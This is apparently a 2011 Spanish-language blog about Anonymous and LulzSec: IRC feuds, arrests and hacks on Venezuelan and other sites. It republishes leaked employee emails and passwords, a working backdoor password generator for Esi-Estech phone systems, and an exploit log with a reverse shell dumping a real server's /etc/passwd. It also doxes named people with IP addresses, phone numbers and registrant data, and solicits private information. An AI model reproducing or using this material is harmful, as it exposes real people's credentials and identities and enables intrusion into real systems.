Buscamos el sumario de Urdangarin

envíalo a [email protected]

Usuarios descontentos



Me ha llegado alguna que otra queja de usuarios del canal de #iberoamerica, ya que al parecer, los operadores empiezan a banear a diestro y siniestro por el mero hecho de estar inactivos durante unas cuantas horas en el canal (no quieren espías) y por abusar de sus poderes.

Tampoco es que yo pueda hacer mucho más allá de bombardearles con drones, pero si tenéis miedo a que os pateen, cread un canal alternativo en AnonOps y buscad apoyos.

No hay nada peor que entrar a un canal de IRC y temer que te expulsen por no caer bien a los operadores o no tener la libertad de comentar lo que te de la gana por miedo a que te echen.

Lo cierto es que el canal de #iberoamerica da risa y al mismo tiempo pena, sobre todo cuando planifican o montan sus operaciones de “Anonymous”.

Por otra parte, si tenéis información personal y privilegiada de cualquiera de esos tiranos podéis enviármela a [email protected] y si la información coincide con la que yo tengo y es exacta, la publico en el blog. 

Contradicciones en AnonOps



Hace unas horas en el Twitter de Redacted (AnonymousIRC) se comentaba que se había hackeado los servidores de la OTAN y descargado casi un gigabyte de archivos confidenciales. Al poco rato comentaba que no iban a publicar todos los archivos porque sería una “irresponsabilidad”. Entonces, no sé entiende muy bien porque en ese mismo Twitter se animaba a participar en la Operación de Wikileaks, cuando esta misma organización publicó los correos privados de los embajadores de estados unidos y también podría haberse visto afectado las relaciones diplomáticas que EE.UU mantiene con otros países y su seguridad nacional.

Si apoya y defiende que unos filtren a la opinión pública información confidencial de los gobiernos y se autoproclama defensor de la libertad de expresión y de la transparencia, ahora es muy hipócrita al venir con discursos moralistas y que sería una irresponsabilidad publicar todo lo que han obtenido, y más, cuando en ese mismo Twitter se difundió la operación de HBGary en donde se sustrajo más de 80.000 mensajes de correo y aseguraban tener partes del código de “StuxNet”.

Si los de “siempre” han hackeado la página de la OTAN, seguramente no lo publicarán, pero si ha sido otra persona, probablemente ahora ese mismo archivo se encuentre por la red o no tardarán mucho en publicarlo.

Si no piensas publicar algo, no lo digas públicamente, ya se encargará la OTAN de denunciar que se han descargado ilícitamente más de un gigabyte de archivos, como sucedió con SONY.  


En el blog de GlynissParobek (AnonHispano.blogspot.com) han publicado un pastehtml con información personal de policías colombianos y después lo ha publicado la prensa.

El archivo llevaba en la red desde el 2 de mayo y quienes lo hicieron fueron GlynissParobek, me, e IceHack (Creador de OpColombia en Facebook).


GlynissParobek, se llama Fernando fuerte, es mejicano y está es una de sus IPS:

189.216.12.81 - customer-189-216-12-81.cablevision.net.mx  


Aquí hay más información sobre él:


Y aquí unas cuantas fotografías:



¡Han detenido a Trivette!


Ayer por la tarde-noche la prensa se entero de que el FBI había detenido a 14 personas relacionadas con Anonymous y a 2 personas más por hackear las página de Tampa Bay InfraGard y AT&T. Al único que conozco es a Trivette. Los otros estaban registrados en AnonOps pero no los he visto nunca, así que imagino que el FBI va a por cualquiera.

Trivette (antes Token) es de la época de Alca y localhost y fue una de las personas que fundaron AnonOps. Aunque antes si que estaba en el command de AnonOps, hace bastantes meses que dejo de serlo y no tenía poder alguno, aunque estuviese como operador en la mayoría de canales.

Los internacionales tampoco parece que vayan a montar ninguna operación en respuesta a las detenciones.



Antes de ayer comenté que se decía por la red que iban a hackear algunas páginas venezolanas. Ayer por la noche publicaron otro archivo de 3MB en mediafree. Quizás lo más significativo o lo que más importancia tiene, es una lista de empleados del noticiero de Venevision con sus correos, nombres, apellidos y contraseñas:

//twitter.com/#!/SwichSmoke

//www.mediafire.com/?7o3reh0x9nqj4i2

email    fname    lname    passwd
[email protected]    angelica    marcano    xr8kkw
[email protected]    guillermo    escalante    ccbt54
[email protected]    andres    lopez    6z9m3r
[email protected]    Aaron    Carpio    du4q14
[email protected]    Angel    Urrieta    nuid4m
[email protected]    Aries    Azuaje    5gcbww
[email protected]    MAyita    Diaz    ilvqim
[email protected]    Jairo Abel    Natera Carvajal    51jmh3
[email protected]    raquel    urbano    0m07zd
[email protected]    maria    martinez    zgesc8
[email protected]    Leonel    Verdeja    fwxdce
[email protected]    Alba    Canizalez    b16rbo
[email protected]    Mónica    Pérez    p4tgf1
[email protected]    V.J.    Los Arcos Ayape    29mtkq
[email protected]    adafel    gonzález    8fmn3w
[email protected]    Ernesto    Azuaje    cbbpzt
[email protected]    adelita    gallegos    ay7nrs
[email protected]    robert    contreras    m3fw23
[email protected]    Aris    Angulo    ytrxa8
[email protected]    Adolfo    Ponce    xaveip
[email protected]    adolfo    simosa    b5jzjl
[email protected]    jesùs    duarter    xl6yte
[email protected]    adrian    baptista    jhjytu
[email protected]    adriana    lugo perez    30ltri
[email protected]    Adriana    Matos    3lv34p
[email protected]    Adriana    Carrillo    1312p4
[email protected]    yarimar    avila    0uj0t9
[email protected]    Adriana    Torres    fup61g
[email protected]    BEATRIZ ADRIANA    VARELA    8gm3de
[email protected]    Aischa    Durand    v5dora
[email protected]    Andrea    Rodriguez    8ofzi3
[email protected]    arelis    aguilar    q14z8o

Y estás son las tablas que han hackeado:

usuario_secciones   
oscar2009_encuesta   
Encuestas_opciones   
usuario   
Encuestas_votacion   
Encuestas_secciones   
Encuestas_preguntas   
spotligtht   
registro_malanga   
registro   
somostuyyo_trivia   
ce_lasolucion_problema   
pais   
nuevemeses   
horoscopo   
hlimite   
somostuyyo_registro   
historia_musical   
estrellasdelamusica   
EncuestaVVNet   
cartasanta2002   
atomico   
somostuyyo_casting   
postal   
registro_temp   
postal_madre   
beisbol_trivia   
reg_sandugueo   
TraceTable   
dataencuesta   
related_multimedia   
categoria   
usuarios_noticias   
estado   
multimedia   
Encuestas   
uepe_trivia   
docecorazon_usuario   
docecorazon_mensaje   
sysdiagrams   
prueba   
Arq_horoscopos   
somostuyyo_trivia02   
recetas_portadas   
estatchat   
usuario_permisos   
usuario_subsecciones
El FBI ha realizado 14 detenciones de personas acusadas de promover ciberataques como el de Paypal dentro de la operación "Avenge assange", Sony o el gobierno americano.
Las detenciones se han realizo en diversos estados norteamericanos y los detenidos han sido los siguientes: Christopher Wayne Cooper, de 23 años y conocido como 'Anthrophobic'; Joshua John Covelli, de 26 años y que usaba los sobrenombres de 'Absolem' y 'Toxic'; Keith Wilson Downey, también de 26 años; Mercedes Renee Haefer, de 20 y conocida como 'No' y 'MMMM', y Donald Husband, de 29 años y que se hacía llamar "Ananon". Completan la lista Vincent Charles Kershaw, de 27 años y que actuaba como 'Trivette', 'Triv' y 'Reaper'; Ethan Miles, de 33; James Murphy, de 36; Daniel Sullivan y Christopher Quang, ambos de 22 años; Tracy Ann Valenzuela, de 42 años y Drew Alan Phillips, de 26 y que usaba el nombre virtual de 'Drew010', así como Jeffrey Puglisi, de 28 años y conocido como 'Jeffer', 'Jefferp' y 'Ji'. También hay otro detenido del cual no han facilitado sus datos.
Por lo que comenta el FBI estas detenciones están dentro de un total de 35 ordenes de arresto que han sido cursadas para detener a participantes en diversos ciberaataques, no han clarificado si también hay miembros de Lulzsec en dichas ordenes de detención aunque si ha habido otros dos detenidos que no los relacionan con Anonymous: Scott Matthew Arciszewski, de 21 años y que fue detenido en Florida, y Lance Moore, también de 21 años y al que las autoridades capturaron en Nueva Jersey.Arciszewski está acusado de atacar la web de la firma Tampa Bay InfraGard, que colabora con el FBI, mientras que Moore atacó los sistemas de la compañía de telecomunicaciones AT&T para obtener documentos e información confidencial de la misma.
Estaremos atentos a las acciones de protesta que puedan convocarse.

AntiSec - Hackeo a la web de Esi-Estech


esi-estech.com  Phone system back door password generator. 
These phone systems listen on port 59002
Some installations have door locks attached to them to.  This gives you full access to the system and the ability to listen to all voicemails as well as do anything else you like.

You can use this system software to do what you like with their systems once you get in.

//www.megaupload.com/?d=DX492GCT

Imports System
Imports System.Diagnostics

Module Module1

    Sub Main()
        Console.Write("Master Tech Password Today Is: " & MasterTechPasswordOfTheDay() & vbCrLf)
        Console.Write("Password Of The Day Is: " & EngineerPasswordOfTheDay() & vbCrLf)
        Stop
    End Sub


    Private Function ExtractDateTimeValues() As Integer()
        Dim strArray As String() = New String() {DateTime.Now.ToUniversalTime.Month.ToString, DateTime.Now.ToUniversalTime.Day.ToString, DateTime.Now.ToUniversalTime.Year.ToString}
        Return New Integer() {Val(strArray(0)), Val(strArray(1)), Val(strArray(2).Substring((strArray(2).Length - 1), 1))}
    End Function

    Public Function MasterTechPasswordOfTheDay() As String
        Dim num As Integer = 0
        Try
            Dim numArray As Integer() = ExtractDateTimeValues()
            num = ((((numArray(0) + numArray(1)) + numArray(2)) * &H14B) - (numArray(1) * (&H6F + numArray(1))))
        Catch exception As Exception
            Trace.WriteLine(("password:MasterTechPasswordOfTheDay - EXCEPTION:" & exception.ToString))
        End Try
        Return num.ToString
    End Function

    Public Function EngineerPasswordOfTheDay() As String
        Dim str As String = DateTime.Now.ToShortDateString
        Dim num As Integer = Val(str.Substring(0, 2))
        Dim num2 As Integer = Val(str.Substring(3, 2))
        Dim str2 As String = ""
        If (str.Length > 9) Then
            str2 = str.Substring(8, 2)
        ElseIf (str.Length > 8) Then
            str2 = str.Substring(8, 1)
        End If
        Dim num3 As Integer = Val(str2)
        Dim num4 As Integer = ((((num + num2) + num3) * &H85) - (num2 * (&H6F + num2)))
        Return num4.ToString
    End Function

    Private Function Val(ByVal str As String) As Integer
        Dim num As Integer = 0
        Dim s As String = ""
        Dim ch As Char
        For Each ch In str
            If Not Char.IsDigit(ch) Then
                Exit For
            End If
            s = (s & ch)
        Next
        If (s.Length > 0) Then
            num = Integer.Parse(s)
        End If
        Return num
    End Function

End Module
//pastebin.com/NuETPDNg 

 
Bukti: //www.eccouncilacademy.org/ECA/robots.txt


[email protected]:~$ ./0wnj00mla

+--------------------------------------------------------+
| GaySec Private Joomla Session Token to RCE Exploit     |
|       Development and coded by: GaySec                 |
|                                                        |
|                                                        |
+--------------------------------------------------------+
[-] Enter Target:
-> www.eccouncilacademy.org
[-] Enter Path:
-> /
[-] Port:
-> 80
[+] Connecting to www.eccouncilacademy.org...
[+] Connected to eccouncilacademy.org
[+] Searching for token...
[+] W000t!!  got it! "AMXhybB3FSBDBYJZU"
[+] Convert the token to the RCE Payload
[+] Execute the shell...
[+] Trying...
[+] Got it!!!
-> Reverse Shell Started
$ id; uname -a; pwd
uid=7647041(ecco1665) gid=100450(inetuser) groups=100450(inetuser) context=user_u:system_r:unconfined_t:s0
Linux sg2nlhg017.shr.prod.sin2.secureserver.net 2.6.18-194.32.1.el5PAE #1 SMP Wed Jan 5 18:43:13 EST 2011 i686 i686 i386 GNU/Linux
/home/content/41/7647041/html/ECA
$ cat /etc/hosts
127.0.0.1  localhost.localdomain localhost
182.50.132.229  relay-hosting.secureserver.net
72.167.234.199     proxy.shr.secureserver.net
$ cat /etc/passwd
a0180915:*:7724050:100450:a0180915:/home/content/50/7724050:/sbin/nologin
a1005443:*:7550259:100450:a1005443:/home/content/59/7550259:/sbin/nologin
a270895037:*:7706634:100450:a270895037:/home/content/34/7706634:/sbin/nologin
a3818565:*:7625474:100450:a3818565:/home/content/74/7625474:/sbin/nologin
a3de7797:*:8018681:100450:a3de7797:/home/content/81/8018681:/sbin/nologin
a51o9564:*:7752707:100450:a51o9564:/home/content/07/7752707:/sbin/nologin
aadu3620:*:7569984:100450:aadu3620:/home/content/84/7569984:/sbin/nologin
aaimhi:*:8084553:100450:aaimhi:/home/content/53/8084553:/sbin/nologin
aak66666:*:8085318:100450:aak66666:/home/content/18/8085318:/sbin/nologin
aaku7663:*:7589986:100450:aaku7663:/home/content/86/7589986:/sbin/nologin
aane1747:*:7672992:100450:aane1747:/home/content/92/7672992:/sbin/nologin
aaou2052:*:7508965:100450:aaou2052:/home/content/65/7508965:/sbin/nologin
aary8447:*:7555001:100450:aary8447:/home/content/01/7555001:/sbin/nologin
aashishben:*:7692506:100450:aashishben:/home/content/06/7692506:/sbin/nologin
aassifan1:*:7823615:100450:aassifan1:/home/content/15/7823615:/sbin/nologin
aata5038:*:8113415:100450:aata5038:/home/content/15/8113415:/sbin/nologin
aatamvichar:*:7516717:100450:aatamvichar:/home/content/17/7516717:/sbin/nologin
abaaad:*:7789742:100450:abaaad:/home/content/42/7789742:/sbin/nologin
abda3632:*:7523600:100450:abda3632:/home/content/00/7523600:/sbin/nologin
abde3097:*:7784324:100450:abde3097:/home/content/24/7784324:/sbin/nologin
abdu2051:*:7733172:100450:abdu2051:/home/content/72/7733172:/sbin/nologin
abdu2122:*:8051731:100450:abdu2122:/home/content/31/8051731:/sbin/nologin
abha6735:*:7604896:100450:abha6735:/home/content/96/7604896:/sbin/nologin
abhinavbirla:*:7725854:100450:abhinavbirla:/home/content/54/7725854:/sbin/nologin
abhithc:*:7672592:100450:abhithc:/home/content/92/7672592:/sbin/nologin
abid526669:*:7540364:100450:abid526669:/home/content/64/7540364:/sbin/nologin
abint:*:7559738:100450:abint:/home/content/38/7559738:/sbin/nologin
abou7113:*:7614264:100450:abou7113:/home/content/64/7614264:/sbin/nologin
abou9539:*:8093556:100450:abou9539:/home/content/56/8093556:/sbin/nologin
aboutpcj:*:7824299:100450:aboutpcj:/home/content/99/7824299:/sbin/nologin
abouzar:*:7691383:100450:abouzar:/home/content/83/7691383:/sbin/nologin
abrt5242:*:7532990:100450:abrt5242:/home/content/90/7532990:/sbin/nologin
abso8361:*:7673316:100450:abso8361:/home/content/16/7673316:/sbin/nologin
abua3792:*:7528888:100450:abua3792:/home/content/88/7528888:/sbin/nologin
abujbara300:*:7644677:100450:abujbara300:/home/content/77/7644677:/sbin/nologin
abuk4032:*:7729315:100450:abuk4032:/home/content/15/7729315:/sbin/nologin
abuy9365:*:7562448:100450:abuy9365:/home/content/48/7562448:/sbin/nologin
acal3859:*:7558361:100450:acal3859:/home/content/61/7558361:/sbin/nologin
acca9155:*:7498348:100450:acca9155:/home/content/48/7498348:/sbin/nologin
acco6823:*:7936695:100450:acco6823:/home/content/95/7936695:/sbin/nologin
acco7339:*:7649613:100450:acco7339:/home/content/13/7649613:/sbin/nologin
acdr5893:*:8029317:100450:acdr5893:/home/content/17/8029317:/sbin/nologin
achc0388:*:7786315:100450:achc0388:/home/content/15/7786315:/sbin/nologin
achotsao:*:7724403:100450:achotsao:/home/content/03/7724403:/sbin/nologin
acid0558:*:8025842:100450:acid0558:/home/content/42/8025842:/sbin/nologin
acli4323:*:7761362:100450:acli4323:/home/content/62/7761362:/sbin/nologin
acma0998:*:7563173:100450:acma0998:/home/content/73/7563173:/sbin/nologin
acme2009:*:7822590:100450:acme2009:/home/content/90/7822590:/sbin/nologin
acne3143:*:7553212:100450:acne3143:/home/content/12/7553212:/sbin/nologin
acti6929:*:7604761:100450:acti6929:/home/content/61/7604761:/sbin/nologin
actorshiva:*:7740636:100450:actorshiva:/home/content/36/7740636:/sbin/nologin
adag2020:*:7565837:100450:adag2020:/home/content/37/7565837:/sbin/nologin
Archivo completo:
//www.gaysec.net/gay/eccouncilacademy.org.txt



Bueno, no es que haya mucho en el archivo que han colgado, pero no esta mal para empezar si después cuelgan información comprometida de las instituciones venezolanas.

En el archivo que han puesto a disposición de todo el mundo, hay 10 archivos entre los que se incluyen 2 capturas de pantalla que demuestran que la página web de www.lara.gob.ve/ ha sido hacheada, 2 archivos en pdf que no sé muy bien lo que significan y varios archivos más.

Os lo podéis descargar aquí:

//www.megaupload.com/?d=S8PO0Z4U

O podéis seguir el Twitter de SwichSmoke:

//twitter.com/#!/SwichSmoke



Se comenta por la red, que han hackeado y que van hackear varias paginas webs de Venezuela y que piensan publicar uno o varios archivos de más de 100 MB en apoyo a las operaciones de Anonymous y LulzSec. El hacker se hace llamar SwichSmoke y estás son las paginas que asegura haber hackeado o que tiene pendiente de hacerlo.

CANTV.NET
LARA.GOB.VE
Glovovision
Venezolana Televisión
me.gov.ve
presidencia.gov.vez

Supongo que habrá que esperar para ver si es cierto o no.

//pastebin.com/3h5f1JfY


Voice by Lulzsec

Lulzsec ha presentado un pastebin (//pastebin.com/JFPM3Ggj) en el que informan de un nuevo canal denominado "Voice": Web chat: //irc.lc/anonops/voice/. Animan a todo el mundo a crear contenidos, tanto de papel como multimedia para extender su comunicación. Todo esto parece que va unido a la famosa "Operación Misteriosa" que comentan que se realizará al conseguir 75.000 seguidores de #Pastebin en Twitter, actualmente superan los 14.000 seguidores, habiéndolos duplicado en 2 días.

¿Anonymous Iberoamerica?


Buscaba desde hace tiempo una confrontación entre blogs y hoy por fin ha llegado el día. No porque crea que esto sea importante, ya que a la mayoría de las personas les da realmente igual todas estás movidas (y me parece algo ridículo), pero mientras algunos medios de comunicación sigan difundiendo las hazañas de #iberoamerica, tergiversan todo un movimiento.

La operación de Tucumán fue propuesta de forma espontánea por un ‘Anónimo’, pero da la casualidad de que esta propuesta ha tenido reprecisión en la prensa.

En muchos foros de internet, casi todos los días, hay gente que suele hacer lo mismo - proponer operaciones - pero no tienen mayor trascendencia porque nadie se entera.

Al margen de que a titulo personal pueda estar de acuerdo o no con lo de ‘Tucumán’, hay una cosa mucho más importante ‘la descentralización’ y es que si algo caracteriza a Anonymous, es que cualquier persona puede tomar un papel de liderazgo en la difusión de la conciencia Anon y en iniciar un nuevo mensaje ideológico bajo la bandera de Anonymous.

Si la operación es legítima o no, dependerá de la cantidad de personas que participen en la operación y de la cantidad de críticas o halagos que obtenga la misma.

La persona que decidió iniciar una nueva campaña bajo el nombre de Anonymous, no menciono ni tan siquiera al canal de #iberoamerica de IranServ, si no que en el flayer que hizo, colocó un canal ‘#OpTucuman’ y puso un logo que habían creado unas cuantas personas del canal de #iberoamerica.

Ante todo esto, me quedé un poco sorprendido, porque si se aplicará esta lógica, las personas que crearon los primeros logos de Anonymous, tendrían el derecho de desmentir cualquier operación que se monta en AnonOps o en cualquier otro servidor.
 
Todos los blogs, cuentas de Twitter, grupos de Facebook, cuentas de YouTube, son creados por personas y solamente lo controla quien lo ha creado y todas ellas son manejadas por operadores de #Iberoamérica.



Por eso me deja estupefacto que una de esas cuentas tenga la capacidad para desmentir e ilegitimar una operación de Anonymous y además se crean con el derecho de decir que un logo es propiedad de ellos, y que nadie más puede utilizarlo.

Llevo unos 3 años aquí en Anonymous (10 meses participando activamente) y si de verdad creéis y os importan esto, deberías de revelaros contra todos aquellos que buscan protagonismo y poder en Anonymous creando canales alternativos y no hacer “lo que unos cuantos digan”, ni dar poder a nadie.

Anonymous no existe, es solo una idea y el que alguien diga que su blog o cuenta de Twitter es Oficial, no solo está faltando a la verdad, si no que únicamente busca obtener un reconocimiento y ser importante.

Las operaciones no hay que buscarlas, si no que simplemente vienen solas. Cuando suceden acontecimientos que cabrean a muchísimas personas, son estás mismas quienes se movilizan sin que nadie haya escrito un piratenpad y someta a votación su propuesta, porque no hace falta ya que todo el mundo está de acuerdo.

Si a Assange le extraditan a Suecia, ¿De verdad creéis que se va a votar la operación en algún lado en AnonOps? ¿Creéis qué la Operación de Wikileaks se votó? o lo de la Ley Sinde,  la operación de Libia, Yemen, Túnez, Sony, Payback, etc

Solamente se vota cuando en una operación tiene muchos objetivos.

Operación Tucumán - #iberoamerica



Ayer por la noche estaba en el chat y me quede un poco sorprendido porque algunos operadores y usuarios del canal de #iberoamerica empezaron a decir que la Operación de Tucumán no era de Anonymous porque lo no habían organizado ellos, que quien propuso esa operación utilizaba el logo de la célula anon de #iberoamerica, que tenían que hacer un comunicado diciendo que "Anonymous Iberoamérica desmiente su participación en esta OP. No tenemos conocimiento de ella. Ese comunicado no es nuestro. Gracias.", etc.

Así que por todo ello, para demostrarles que Anonymous no es de nadie y cualquiera puede montar una operación, a las personas que queríais participar en esa operación, podéis entrar al canal de #hispano del servidor de IranServ mediante este webchat:

//lightirc.com/start/?host=chat.iranserv.com&autojoin=%23hispano&language=es&showNickSelection=true&nick=User_%25

O utilizando un cliente de irc:

/Server irc.iranserv.com 6667 o /server -e irc.iranserv.com 6697



Extraido de:

//www.elpais.com/articulo/internacional/Anonymous/amenaza/policia/justicia/juicio/Assange/elpepuint/20110711elpepuint_14/Tes

Anonymous regresa en defensa de Assange. Varios miembros destacados del colectivo han amenazado con lanzar ataques contra la policía y la justicia británicas mañana, día en que la extradición de Julian Assange vuelve a ponerse en juego. El editor australiano comparece ante el Tribunal Superior de Londres, donde se verá el recurso que plantearon sus abogados para evitar que sea llevado ante la justicia sueca.

"Estamos trabajando en dos de las más grandes entregas de Anonymous de los últimos cuatro años. Pónganse los cascos. Es la guerra". Así reza uno de los tuits de @anonymouSabu, supuestamente, un destacado miembro del colectivo hacktivista, según publica el diario The Guardian.

Los activistas de la Red amenazan con dos tipos de acciones. Por un lado, ataques a los sistemas informáticos de la policía y la Justicia. Por otro, dos entregas de información "explosiva" y comprometedora para ambas instituciones. Protestan por la posible extradición de Assange así como por las escuchas ilegales realizadas por el extinto tabloide News of the World.

"Será el día más grande en la historia de Anonymous", se puede leer en otro tuit. En diciembre del año pasado, cuando Visa, Mastercard y Paypal dejaron de dar servicio a WikiLeaks -cortando así la vía para que le llegaran donaciones- recibieron furiosos ataques DDOS -ataques de denegación de servicio- de Anonymous como acto de represalia.


================

Después de leer esto y de pedir información en AnonOps, hacer un ataque DDoS va a ser muy complicado, así que imagino que intentaran hackear las paginas (si es que no lo han hecho ya). También hay que ver si Sabu se ha marcado un farol o no.

Los servidores de AonOps continuan teniendo problemas y es muy dificil acceder a ellos. A ver que pasa mañana y en los proximos días.


AnonSpain.com


Joder, acabo de entrar en el blog de AnonSpain.com y creo que se le ha ido la cabeza. Ha puesto en el blog documentales que no sé muy bien que pintan con Anonymous - a ver cuanto tarda en poner videos porno -. Tampoco es que lo actualizara mucho el cabrón. Lo más triste de todo, es que su blog ha salido publicado en muchos medios de comunicación en la llamada 'Operación Ley Sinde'.

Por otra parte - para los que no lo sepais - hay otro blog que esta bastante bien y que de vez en cuando publican noticias y/u opiniones de Anonymous. Os dejo la URL para que lo visiteis y podais colaborar si quereis.

//www.anonymousespaña.es/

En lo que se refiere al canal de #anonhispano (hispano e hispania) esta más que muerto e #iberoamerica le sigue los mismos pasos. Así que tampoco hay mucho que comentar al respecto hasta que no pase algo gordo y la gente se vuelva a animar a entrar otra vez.

- esto no tiene nada que ver con Anonymous - el otro día en AnonOps hable con un pavo que pertenecia a A.S.C. (Albania Security Clan) y que conocí en Skidsr, y me comentó que varios de ellos tenían la intención de reclutar y formar un grupo para localizar servidores de pederastas por la red. Si te interesa, mandame un e-mail.

Y para acabar, los servidores de AnonOps continuan teniendo problemas y es bastante dificil poder acceder a ellos.




El canal de #iberoamerica se supone que es un punto de encuentro para ‘Anonymous’, pero lo único que tienen de Anonymous, es el nombre de las operaciones. Utilizan la consigna Anon para tener una mayor difusión en los medios de comunicación y contra más salen en la prensa, más se alimentan.

El canal lo suelen manejar unas 5 o 6 personas y quizás el más importante o el cabecilla sea ‘GlynissParoubek’, puesto que suyo es el blog de ‘AnonHispano’ y también posee diferentes grupos de Facebook, Twitter y es operador de #iberoamerica.

La planificación y los ataques son muy rudimentarios. Tienen éxito porque atacan a páginas débiles que se pueden tirar con 15 LOIC. Algo a destacar de allí, es que los operadores no tienen ni idea de lo que hacen y simplemente ponen un target en el topic y animan a las demás personas que hay en el canal a atacar.

Como se decía en #hispatroll, son todos newfags.

De vez en cuando, entra gente con más conocimientos técnicos y utilizan alguna que otra botnet. La siguiente que vais a ver, es una captura de pantalla es de una botnet que utilizó Lexus para atacar a las páginas webs peruanas:
 

A ver si empiezan a detener los policías de Sudamérica a los operadores de #iberoamérica, ya que estos no tienen conciencia alguna.

AnonOps K.O.


Llevan más o menos desde la madrugada caídos todos los servidores de AnonOps y parece que va a durar bastante tiempo. De momento nadie sabe quien o quienes son los autores del ataque y no era de extrañar que esto sucediese, ya que la operación AntiSec se ha ganado muchas amistades pero también muchas enemistades entre las distintas comunidades de hackers que pululan por la red. Los únicos servidores que se mantienen en píe ahora, son IranServ, AnonNet y el servidor de Irc de Venuism.

Unos hackers Finlandeses seguidores de LulzSec


Unos hackers finlandeses han hecho un deface a 9 páginas francesas ( dvi-network.com - dviaccess.fr - dvi.fr - dvicam.com - dviforma.com - o-petit-hotel.fr - lecaoutchouc.fr - letibetain.fr - valnext.fr ) cuyo mensaje es este:

Somos algunos hackers de Finlandia! que lo hicimos sólo por diversión! SOMOS FI-LulzSec! : D


Puedes ponerte en contacto con ellos a través del servidor de IRC 'ircnet' en el canal de #fi-lulzsec. Son bastante enrollaos y si les caes bien, no te será muy dificil convencerles para que hackeen la web de tu empresa o cualquier otra si tiene vulnerabilidades :D


Anonymous, TeamPoison, th3j35t3r, una locura.



Llevan desde hace mucho tiempo intentando hackear los servidores de AnonOps. Si hace unos cuantos días circulaba un pastebin con la contraseña encriptada de los ircops publicada por ‘TeamPoison’ con el doxeo de unos cuantos miembros de Anonymous y LulzSec, ahora un viejo conocido de Anonymous ‘th3j35t3r’ asegura haber penetrado en uno de los servidores de AnonOps. No obstante, por el IRC no se ha comentado nada y por lo tanto no habrá ha sido muy grave.


Luego como respuesta, otros miembros de Anonymous aseguran haber doxeado a los de TeamPoison:


En resumidas cuentas, la Operación AntiSec es una locura y no se conoce ni la mitad de todo lo que esta ocurriendo. 


Un ejemplo, es LulzSec Italy. Aseguran haber hackeado 18 webs de universidades italianas y han publicado una muestra en la red.


Otro ejemplo es lo que sucedió hace 3 o 4 días donde un miembro de “AntiSec” aseguraba haber hackeado la página del presidente de Pakistán:


Y por si fuera poco, han creado hasta una Academia de LulzSec. Se hacen llamar “Blackhat Academy”





Al margen de la Operación AntiSec, ha aparecido una nueva operación ‘Op Tennessee’ en AnonOps para denunciar los abusos del gobierno al pretender aprobar una ley que tipifica como delito la publicación de imágenes que "provocan un malestar emocional o que pueden asustar e intimidar" con penas de prisión de hasta 1 año o una multa de 2.500 dólares. También se quejan de que recientemente ha sido aprobada una ley opresiva en donde han declarado como ilegal compartir archivos. Por todas estás razones, han decidido atacar esta noche a las 11 (hora española) a la página web de TNVACATION.COM.


Fotos de Glyniss



Algunas personas me han comentado que ponga fotos de Glyniss, ya que al parecer ha subido la libido a muchas chicas el video ese que hizo. A todos(as) que me lo habéis pedido, aquí las tenéis.















En la operación «Secure Italy» han sido denunciadas 15 personas, de edades comprendidas entre los 15 y los 28 años y entre las que hay 5 menores

//www.abc.es/20110705/internacional/abci-identificada-cupula-anonymous-italia-201107051437.html


No sé porque, pero esperaba que ocurriera algo así. En Italia Anonymous no es que tenga mucha popularidad, al menos en AnonOps. Es más bien un grupo reducido de personas.

Durante las últimas semanas quizás se han pasado un poco con los ataques, ya que no hace mucho tumbaron 2 webs simultáneamente del gobierno y también la página del partido político de Berlusconi.

Sobre si en Italia hay cúpula o no, es más bien un NO. Los canales de #OpItaly e #Italy funcionan igual que el resto de canales internacionales de AnonOps.

Sinceramente, es una putada lo que les han hecho, ya que en la época en la que ‘Anonymouse’ estaba como fundador de #hispano, solíamos tratar bastante con ellos y estamos en deuda con los italianos porque fueron una parte muy importante en las operaciones que se montaban en #hispano antes que se dividiese el canal. 

     

Sumario judicial de los 3 Anonymous detenidos


Son 21 autos en pdf + 1 auto de entrada + 1 de datos + 1 auto de deligencias previas por lo de Wicker.


//www.megaupload.com/?d=286P9SK8



Francisco Bernal - Ceo de AnonWorld


Cuando AnonWorld hizo un comunicado de despedida,  firmaron "Aaron Crespo" y  "Francisco Bernal" como CEO de AnonWorld.

Podeís verlo aquí:

//www.anonymoushispano.net/2011/06/anonworld-se-cierra-o-eso-dicen.html

En el blog de GlynissParoubek, editaron la entrada; quitaron los nombres y los apellidos cuando al día siguiente detuvieron a las 3 personas.

Esas 2 personas que firmaron el comunicado de despedida de AnonWorld y que eran amigos de DevNuller, le han dado la espalda y se han reído de él, antes y ahora.

Estás son unas capturas de pantalla de mi log, dónde Pacotron reconoce que tiene 2 dominios un día antes de que supieramos las detenciones. Lo comentó en un servidor casero que monto al desaparecer AnonWorld (fjbernal.es y pacotron.es):



Cuando haces un whois desde el enlace de: //www.nic.es/sgnd/dominio/publicInformacionDominios.action a los dominios de pacotron.es y fjbernal.es, te aparece esto:

DATOS DEL TITULAR
Nombre del Dominio     pacotron.es
Estado     Activado
Identificador     18811E-ESNIC-F5
Titular     Francisco Javier Bernal Domingez
Email     [email protected]
Teléfono     +34 656891850
Fecha de Alta     17-05-2011
Fecha de Caducidad     17-05-2012
Agente Registrador     1&1 Internet

==========


DATOS DEL TITULAR
Nombre del Dominio     fjbernal.es
Estado     Activado
Identificador     18811E-ESNIC-F5
Titular     Francisco Javier Bernal Domingez
Email     [email protected]
Teléfono     +34 656891850
Fecha de Alta     14-12-2010
Fecha de Caducidad     14-12-2011
Agente Registrador     1&1 Internet


========

Actualmente, tiene un servidor de IRC casero  'binarysec.dyndns.org 6667' cuya IP es esta "81.39.48.148 ( 148.Red-81-39-48.dynamicIP.rima-tde.net )"

Y según su perfil de linkedin, es de Málaga o alrdedores:

//es.linkedin.com/pub/francisco-javier-bernal-dom%C3%ADngez/29/703/a45

También tenía una VPS en AnonWorld alojada en Suiza:

178.73.219.173/6697- greymon.anonworld.net/6697

Aunque esto último es lo que me han comentado y no lo puedo asegurar, pero si es cierto que tenia una VPS.

Por fin se sabe por que la SGAE quiere recaudar tanto:

Extraido de:

//www.rtve.es/noticias/20110701/guardia-civil-registra-sede-sgae-presunto-desvio-fondos-apropiacion-indebida/444928.shtml

La Guardia Civil está registrando la sede de la SGAE en el marco de una operación ordenada por la Fiscalía Anticorrupción por un presunto delito de desvío de fondos y apropiación indebida, según han confirmado desde el Instituto Armado a RTVE.es.

El presidente de esta sociedad, Teddy Bautista, será puesto a disposición judicial.
Según fuentes de la investigación, esta operación se ha abierto a raíz de una denuncia que otra sociedad presentó hace dos años ante la Fiscalía Anticorrupción por apropiación indebida.

Las mismas fuentes han asegurado que, además de Teddy Bautista, otras dos personas serán puestas también a disposición del Juzgado Central de Instrucción número 5 de la Audiencia Nacional, del que es titular el juez Pablo Ruz.

